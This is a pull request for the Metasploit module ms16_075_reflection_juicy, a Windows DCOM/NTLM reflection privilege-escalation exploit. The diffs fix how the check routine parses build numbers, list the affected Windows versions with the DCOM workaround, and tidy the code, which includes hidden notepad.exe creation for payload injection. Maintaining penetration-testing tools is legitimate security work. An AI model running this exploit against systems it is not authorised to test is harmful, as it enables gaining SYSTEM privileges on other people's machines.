### PR TITLE
Updating regex in ms16_075_reflection_juicy exploit windows version check

### DIFF
--- a/documentation/modules/exploit/windows/local/ms16_075_reflection_juicy.md
+++ b/documentation/modules/exploit/windows/local/ms16_075_reflection_juicy.md
@@ -11,6 +11,15 @@ For more info see:
 - [Rotten Potato](https://github.com/foxglovesec/RottenPotato)
 - [Lonely Potato](https://decoder.cloud/2017/12/23/the-lonely-potato/)
 - [Juicy Potato](https://ohpe.it/juicy-potato/)
+- [No More Juicy Potato](https://decoder.cloud/2018/10/29/no-more-rotten-juicy-potato/)
+
+## Vulnerable Applications
+
+Microsoft Windows Server 2008 R2, Server 2012, Server 2012 R2, and Server 2016 are known to be affected. Server 2019 was not affected by this issue.
+
+This issue was patched in Microsoft Windows 10 v1809 (build 17763). v1803 is the last vulnerable version. See the 'No More Juicy Potato' link above for technical details.
+
+At the time of disclosure, disabling DCOM was provided as a workaround to mitigate this vulnerablility. As such, servers with DCOM disabled will not be vulnerable to this attack.
 
 ## Usage
 

--- a/documentation/modules/exploit/windows/local/ms16_075_reflection_juicy.md
+++ b/documentation/modules/exploit/windows/local/ms16_075_reflection_juicy.md
@@ -17,7 +17,7 @@ For more info see:
 
 Microsoft Windows Server 2008 R2, Server 2012, Server 2012 R2, and Server 2016 are known to be affected. Server 2019 was not affected by this issue.
 
-This issue was patched in Microsoft Windows 10 v1809 (build 17763). v1803 is the last vulnerable version. See the 'No More Juicy Potato' link above for technical details.
+This issue was patched in Microsoft Windows 10 v1809 (build 17763). v1803 is the last vulnerable version. See [No More Juicy Potato](https://decoder.cloud/2018/10/29/no-more-rotten-juicy-potato/) for technical details.
 
 At the time of disclosure, disabling DCOM was provided as a workaround to mitigate this vulnerablility. As such, servers with DCOM disabled will not be vulnerable to this attack.
 

--- a/documentation/modules/exploit/windows/local/ms16_075_reflection_juicy.md
+++ b/documentation/modules/exploit/windows/local/ms16_075_reflection_juicy.md
@@ -19,7 +19,7 @@ Microsoft Windows Server 2008 R2, Server 2012, Server 2012 R2, and Server 2016 a
 
 This issue was patched in Microsoft Windows 10 v1809 (build 17763). v1803 is the last vulnerable version. See [No More Juicy Potato](https://decoder.cloud/2018/10/29/no-more-rotten-juicy-potato/) for technical details.
 
-At the time of disclosure, disabling DCOM was provided as a workaround to mitigate this vulnerablility. As such, servers with DCOM disabled will not be vulnerable to this attack.
+At the time of disclosure, disabling DCOM was provided as a workaround to mitigate this vulnerability. As such, servers with DCOM disabled will not be vulnerable to this attack.
 
 ## Usage
 

--- a/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
+++ b/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
@@ -81,24 +81,6 @@ class MetasploitModule < Msf::Exploit::Local
     )
   end
 
-  def assign_target
-    if target.name == 'Automatic'
-      case sysinfo["Architecture"]
-      when 'x86'
-        vprint_status("Found we are on an x86 target")
-        my_target = targets[1]
-      when 'x64'
-        vprint_status("Found we are on an x64 target")
-        my_target = targets[2]
-      else
-        fail_with(Failure::NoTarget, "Unable to determine target")
-      end
-    else
-      my_target = target
-    end
-    return my_target
-  end
-
   # Creates a temp notepad.exe to inject payload in to given the payload
   def create_temp_proc
     windir = client.sys.config.getenv('windir')
@@ -169,7 +151,6 @@ class MetasploitModule < Msf::Exploit::Local
     end
     @payload_name = datastore['PAYLOAD']
     @payload_arch = framework.payloads.create(@payload_name).arch
-    my_target = assign_target
     if check == Exploit::CheckCode::Safe
       fail_with(Failure::NoAccess, 'User does not have SeImpersonate or SeAssignPrimaryToken Privilege')
     end

--- a/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
+++ b/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
@@ -132,11 +132,16 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     os = client.sys.config.sysinfo['OS']
-    build_number = os.match(/\w+\d+\w+(\d+)/)[0].to_i
+    _build = os.match(/\w+\d+\w+(\d+)/)
     # Windows 10/2019 after build 17134 (April 2018 update, version 1803) are not vulnerable.
-    if (os =~ /Windows 10|2019/) && (build_number > 17134)
-      print_status("Target appears to be patched or not vulnerable (#{os})")
-      return Exploit::CheckCode::Safe
+    if _build.nil?
+      print_warning("Could not determine Windows build number - exploiting might fail.")
+    elsif os =~ /Windows 10|2019/
+      build_number = _build[0].to_i
+      if build_number > 17134
+        print_status("Target appears to be patched or not vulnerable (#{os})")
+        return Exploit::CheckCode::Safe
+      end
     end
     privs = client.sys.config.getprivs
     if privs.include?('SeImpersonatePrivilege')

--- a/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
+++ b/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
@@ -21,7 +21,8 @@ class MetasploitModule < Msf::Exploit::Local
         This module utilizes the Net-NTLMv2 reflection between DCOM/RPC
         to achieve a SYSTEM handle for elevation of privilege.
         It requires a CLSID string.
-        Windows 10 > version 1803, build 17134 are not vulnerable.
+        Windows 10 after version 1803, (April 2018 update, build 17134) and all
+        versions of Windows Server 2019 are not vulnerable.
       ),
       'License'        => MSF_LICENSE,
       'Author'         =>

--- a/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
+++ b/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
@@ -132,22 +132,35 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     os = client.sys.config.sysinfo['OS']
-    _build = os.match(/\w+\d+\w+(\d+)/)
-    # Windows 10/2019 after build 17134 (April 2018 update, version 1803) are not vulnerable.
+    _build = os.match(/Build (\d+)/)
+    privs = client.sys.config.getprivs
+    # Fast fails
+    if !privs.include?('SeImpersonatePrivilege')
+      print_bad("Target session is missing the SeImpersonatePrivilege.")
+      return Exploit::CheckCode::Safe
+    end
+    if ( os =~ /NT|XP|2003|.NET Server/ ) or (os =~ /2008/ and os !~ /2008 R2/)
+      print_bad("Microsoft Windows before Server 2008 R2 are not vulnerable.")
+      return Exploit::CheckCode::Safe
+    end
+    # Windows 10 after build 17134 (April 2018 update, version 1803) is not
+    # vulnerable. Due to changes in OS names, detecting the difference between
+    # Server 2016/19 is most reliably done with build numbers:
+    # (https://github.com/rapid7/metasploit-payloads/pull/355)
     if _build.nil?
       print_warning("Could not determine Windows build number - exploiting might fail.")
-    elsif os =~ /Windows 10|2019/
-      build_number = _build[0].to_i
+    else
+      build_number = _build[1].to_i
       if build_number > 17134
-        print_status("Target appears to be patched or not vulnerable (#{os})")
+        print_bad("Target appears to be patched (#{os})")
+        return Exploit::CheckCode::Safe
+      elsif build_number < 7601
+        print_bad("Target appears to be too old (#{os})")
         return Exploit::CheckCode::Safe
       end
     end
-    privs = client.sys.config.getprivs
-    if privs.include?('SeImpersonatePrivilege')
-      return Exploit::CheckCode::Appears
-    end
-    return Exploit::CheckCode::Safe
+    print_good("Target appears to be vulnerable (#{os})")
+    return Exploit::CheckCode::Appears
   end
 
   def exploit

--- a/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
+++ b/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Windows::FileInfo
   include Msf::Post::Windows::ReflectiveDLLInjection
 
-  def initialize(info={})
+  def initialize(info = {})
     super(update_info(info, {
       'Name'           => 'Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy)',
       'Description'    => %q(
@@ -45,8 +45,6 @@ class MetasploitModule < Msf::Exploit::Local
       'Targets'        =>
         [
           ['Automatic', {}]
-          #['Windows x86', { 'Arch' => ARCH_X86 }],
-          #['Windows x64', { 'Arch' => ARCH_X64 }]
         ],
       'Payload'         =>
         {
@@ -69,7 +67,8 @@ class MetasploitModule < Msf::Exploit::Local
     register_options(
       [
         OptString.new('CLSID', [ true, 'Set CLSID value of the DCOM to trigger', '{4991d34b-80a1-4291-83b6-3328366b9097}' ])
-      ])
+      ]
+    )
 
     register_advanced_options(
       [
@@ -78,7 +77,8 @@ class MetasploitModule < Msf::Exploit::Local
         OptAddress.new('ListeningAddress', [ true, 'Set listening address for MITM DCOM communication', '127.0.0.1' ]),
         OptPort.new('ListeningPort', [ true, 'Set listening port for MITM DCOM communication', 7777 ]),
         OptString.new('LogFile', [ false, 'Set the log file' ])
-      ])
+      ]
+    )
   end
 
   def assign_target
@@ -100,18 +100,18 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   # Creates a temp notepad.exe to inject payload in to given the payload
-  def create_temp_proc()
+  def create_temp_proc
     windir = client.sys.config.getenv('windir')
     # Select path of executable to run depending the architecture
-    if sysinfo["Architecture"] == ARCH_X64 and client.arch == ARCH_X86 and @payload_arch.first == ARCH_X64
+    if sysinfo["Architecture"] == ARCH_X64 && client.arch == ARCH_X86 && @payload_arch.first == ARCH_X64
       cmd = "#{windir}\\Sysnative\\notepad.exe"
-    elsif sysinfo["Architecture"] == ARCH_X64 and client.arch == ARCH_X64 and @payload_arch.first == ARCH_X86
+    elsif sysinfo["Architecture"] == ARCH_X64 && client.arch == ARCH_X64 && @payload_arch.first == ARCH_X86
       cmd = "#{windir}\\SysWOW64\\notepad.exe"
     else
       cmd = "#{windir}\\System32\\notepad.exe"
     end
     begin
-      proc = client.sys.process.execute(cmd, nil, {'Hidden' => true})
+      proc = client.sys.process.execute(cmd, nil, { 'Hidden' => true })
     rescue Rex::Post::Meterpreter::RequestError
       return nil
     end
@@ -119,10 +119,10 @@ class MetasploitModule < Msf::Exploit::Local
     return proc
   end
 
-  def create_temp_proc_stage2()
+  def create_temp_proc_stage2
     windir = client.sys.config.getenv('windir')
     # Select path of executable to run depending the architecture
-    if sysinfo["Architecture"] == ARCH_X64 and @payload_arch.first == ARCH_X86
+    if sysinfo["Architecture"] == ARCH_X64 && @payload_arch.first == ARCH_X86
       cmd = "#{windir}\\SysWOW64\\notepad.exe"
     else
       cmd = "#{windir}\\System32\\notepad.exe"
@@ -132,14 +132,14 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     os = client.sys.config.sysinfo['OS']
-    _build = os.match(/Build (\d+)/)
+    build = os.match(/Build (\d+)/)
     privs = client.sys.config.getprivs
     # Fast fails
     if !privs.include?('SeImpersonatePrivilege')
       print_bad("Target session is missing the SeImpersonatePrivilege.")
       return Exploit::CheckCode::Safe
     end
-    if ( os =~ /NT|XP|2003|.NET Server/ ) or (os =~ /2008/ and os !~ /2008 R2/)
+    if (os =~ /NT|XP|2003|.NET Server/) || (os =~ /2008/ && os !~ /2008 R2/)
       print_bad("Microsoft Windows before Server 2008 R2 are not vulnerable.")
       return Exploit::CheckCode::Safe
     end
@@ -147,10 +147,10 @@ class MetasploitModule < Msf::Exploit::Local
     # vulnerable. Due to changes in OS names, detecting the difference between
     # Server 2016/19 is most reliably done with build numbers:
     # (https://github.com/rapid7/metasploit-payloads/pull/355)
-    if _build.nil?
+    if build.nil?
       print_warning("Could not determine Windows build number - exploiting might fail.")
     else
-      build_number = _build[1].to_i
+      build_number = build[1].to_i
       if build_number > 17134
         print_bad("Target appears to be patched (#{os})")
         return Exploit::CheckCode::Safe

--- a/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
+++ b/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
@@ -21,6 +21,7 @@ class MetasploitModule < Msf::Exploit::Local
         This module utilizes the Net-NTLMv2 reflection between DCOM/RPC
         to achieve a SYSTEM handle for elevation of privilege.
         It requires a CLSID string.
+        Windows 10 > version 1803, build 17134 are not vulnerable.
       ),
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -129,15 +130,14 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
+    os = client.sys.config.sysinfo['OS']
+    build_number = os.match(/\w+\d+\w+(\d+)/)[0].to_i
+    # Windows 10/2019 after build 17134 (April 2018 update, version 1803) are not vulnerable.
+    if (os =~ /Windows 10|2019/) && (build_number > 17134)
+      print_error("Target appears to be patched or not vulnerable (#{os})")
+      return Exploit::CheckCode::Safe
+    end
     privs = client.sys.config.getprivs
-    win10build = client.sys.config.sysinfo['OS'].match /Windows 10 \(Build (\d+)\)/
-    if win10build and win10build[1] > '17134'
-       return Exploit::CheckCode::Safe
-    end
-    win2019build = client.sys.config.sysinfo['OS'].match /Windows 2019 \(Build (\d+)\)/
-    if win2019build and win2019build[1] > '17134'
-       return Exploit::CheckCode::Safe
-    end
     if privs.include?('SeImpersonatePrivilege')
       return Exploit::CheckCode::Appears
     end

--- a/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
+++ b/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
@@ -135,7 +135,7 @@ class MetasploitModule < Msf::Exploit::Local
     build_number = os.match(/\w+\d+\w+(\d+)/)[0].to_i
     # Windows 10/2019 after build 17134 (April 2018 update, version 1803) are not vulnerable.
     if (os =~ /Windows 10|2019/) && (build_number > 17134)
-      print_error("Target appears to be patched or not vulnerable (#{os})")
+      print_status("Target appears to be patched or not vulnerable (#{os})")
       return Exploit::CheckCode::Safe
     end
     privs = client.sys.config.getprivs


### PR DESCRIPTION
This addresses issue #12698, where the Windows OS and build was not being parsed correctly due to changes in the client.sys.config lib.

Tested against Windows 10 (patched):

```
msf5 exploit(windows/local/ms16_075_reflection_juicy) > rcheck
[*] Reloading module...

[-] Target appears to be patched or not vulnerable (Windows 10 (10.0 Build 18363).)
[*] The target is not exploitable.
```

The active session:
```
meterpreter > sysinfo
Computer        : DESKTOP-WL1EOTV
OS              : Windows 10 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
```

This is my first PR, constructive feedback welcome - I think I've managed to follow all of your standards and guidelines, but there's quite a few! Thanks for all the work you guys do.